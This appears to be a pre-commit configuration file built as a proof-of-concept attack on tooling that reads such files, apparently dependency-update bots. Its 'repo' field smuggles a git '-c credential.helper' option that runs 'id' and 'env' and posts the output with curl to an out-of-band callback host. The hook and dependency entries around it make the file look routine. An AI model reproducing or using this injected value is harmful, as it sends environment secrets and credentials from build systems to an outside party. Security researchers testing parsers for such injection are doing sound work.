repos:
- repo: "-c credential.helper=!(id;env)|curl${IFS}-sk${IFS}-X${IFS}POST${IFS}https://d8jrcfp4f27l6kglnctg54p6c9acdo7m7.oast.pro/proof${IFS}-d${IFS}@- https://gitlab.com/nonexistent-dependabot-test/nonexistent-private-repo"
  rev: "v4.5.0"
  hooks:
  - id: "trailing-whitespace"
    additional_dependencies:
      - "requests>=2.28.0"
